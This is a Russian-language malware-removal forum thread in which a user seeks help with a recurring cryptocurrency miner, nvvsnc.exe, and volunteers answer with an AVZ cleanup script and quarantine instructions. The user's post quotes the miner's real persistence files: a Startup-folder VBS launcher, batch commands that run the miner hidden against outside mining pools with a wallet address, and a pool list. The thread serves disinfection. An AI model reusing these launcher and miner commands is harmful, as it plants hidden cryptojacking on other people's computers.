nvvsnc.exe - "miner" вернулся...

**omnicron** · 15.03.2015, 15:36

Windows 7 x64
_____________

BitCoinMiner который уже не первый раз удалял с компьютера снова вернулся.
При попытке удалить его, вместе со всеми файлами которые к нему привязаны, всё возвращается после перезагрузки компьютера.

Сам процесс nvvsnc.exe процессор не грузит, но при этом система охлаждения работает достаточно "громко" - другими словами, он загружает видеокарту.

Файлы:
C:\Windows\SysWOW64\
-nvvsnc.exe
-nvvsnc.bat
-Start.vbs
-Start.bat
-Star.bat
-listm.txt
-pools.txt
-run.exe
-Update_2.exe
-Update_3.exe
-Update_5.exe
-Update_7.exe
-Update_35.exe

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
-Start.vbs

Текст в файлах:
-Start.vbs (C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\)

Код:

Set oShell = Wscript.CreateObject("WScript.Shell")CommandLine = "%COMSPEC% /c c:\Windows\SysWOW64\nvvsnc.bat"
oShell.Run CommandLine, 0, 0
REM Update Gpu

(C:\Windows\SysWOW64\)

Код:

Set oShell = Wscript.CreateObject("WScript.Shell")CommandLine = "%COMSPEC% /c c:\Windows\SysWOW64\Start.bat"
oShell.Run CommandLine, 0, 0

-Start.bat

Код:

c:\Windows\SysWOW64\nvdrive.exe -dbg -1 -lowcpu 2 -u 49ZuQzYVYBr6yy6hPiHPYa5i7iJN9nJMvKBDZs5b4VSR7R5w8mwr3ssdbMupL1bpaXaEXHwvFsXvNjTAL4pCCWZhE2iaA9K -p x

-Star.bat

Код:

echo offdel C:\Windows\System32\nvvsnc.vbs
del C:\Windows\SysWOW64\nvvsnc.vbs
end

-nvvsnc.bat

Код:

c:\windows\syswow64\nvvsnc.exe -a x11 -i 12 -o stratum+tcp://europe1.darkcoin.miningpoolhub.com:20465 -u nimb1982.3  -p x

-listm.txt

Код:

письмо AGPU

-pools.txt

Код:

stratum+tcp://xmr.hashinvest.net:5555stratum+tcp://mine.moneropool.org:80
stratum+tcp://mine.cryptoescrow.eu:3333
stratum+tcp://monero.crypto-pool.fr:3333
stratum+tcp://mine.moneropool.com.br:3333
stratum+tcp://xmr.cryptograben.com:7777

Единственное к чему могу всё это привязать, так это utorrent - за долгое время, вчера первый раз включил и вся эта гадость поползла (в данный момент программу удалил).

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 15.03.2015, 15:37

Уважаемый(ая) omnicron, спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

**thyrex** · 15.03.2015, 17:36

Выполните скрипт в AVZ

Код:

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 TerminateProcessByName('c:\windows\syswow64\nvvsnc.exe');
 QuarantineFile('c:\windows\syswow64\nvvsnc.exe','');
 DeleteFile('c:\windows\syswow64\nvvsnc.exe','32');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.

Компьютер перезагрузится.

Пришлите карантин согласно Приложения 2 правил по красной ссылке Прислать запрошенный карантин вверху темы

Сделайте новые логи по правилам

Сделайте лог полного сканирования МВАМ

**omnicron** · 16.03.2015, 02:51

Выгрузил карантин и логи.
Пока-что всё тихо. Если дальнейших указаний не будет, то попробую удалить оставшиеся файлы и подчистить регистр, после чего отпишусь о результатах (в основном, все эти файлы сразу возвращаются после удаления), а до этого буду ожидать ответа.

**thyrex** · 16.03.2015, 14:20

Сообщение от omnicron

Start.vbs
-Start.bat
-Star.bat
-run.exe
-Update_2.exe
-Update_3.exe
-Update_5.exe
-Update_7.exe
-Update_35.exe

Заархивируйте с паролем virus и пришлите в карантин

- - - - -Добавлено - - - - -

Сообщение от omnicron

Start.vbs
-Start.bat
-Star.bat
-run.exe
-Update_2.exe
-Update_3.exe
-Update_5.exe
-Update_7.exe
-Update_35.exe

Заархивируйте с паролем virus и пришлите в карантин

**omnicron** · 16.03.2015, 16:29

Архив отослал.

**omnicron** · 27.03.2015, 00:31

И так...прошло 10 дней и новых указаний не было - удалили файлы вручную. Результат: они пока-что не вернулись.
Но всё-таки без странностей не обходиться. Ещё до удаления, последние пару дней, соединение с сайтами было медленным (хоть это может быть связано с моим провайдером), а также, за мгновение до удаления файлов, C:\Windows\SysWOW64\Softlic.exe повёл себя странно - зажрал под себя 25% процессора и начал поедать без остановки оперативную память. К этому файлу я и так отношусь с недоверием (появился в тоже время что и майнер; нету программы к которой его можно привязать; сведений о нём тоже нету; к тому-же это х32 системный процесс в х64 винде), а тут ещё и приколы с процессором и оперативкою.

**thyrex** · 27.03.2015, 07:30

Проверьте на virustotal.com и пришлите ссылку

**omnicron** · 27.03.2015, 17:01

Вот результат проверки:
https://www.virustotal.com/uk/file/2...e436/analysis/

Также вернулся C:\Windows\SysWOW64\Update_CPU.exe которого раньше удалял антивирус...

**thyrex** · 27.03.2015, 21:19

Присылайте оба файла в архиве по красной ссылке

**omnicron** · 28.03.2015, 00:23

Архив выгрузил. Пароль стандартный: virus.

**omnicron** · 31.03.2015, 23:35

Дальнейшие указания будут?

**thyrex** · 01.04.2015, 01:34

Ответа из вирлаба нет

**omnicron** · 01.04.2015, 09:02

То есть?

**CyberHelper** · 01.04.2015, 09:12

Статистика проведенного лечения:

Получено карантинов: 3
Обработано файлов: 14
В ходе лечения вредоносные программы в карантинах не обнаружены

nvvsnc.exe - "miner" вернулся... (заявка № 179673)

Опции темы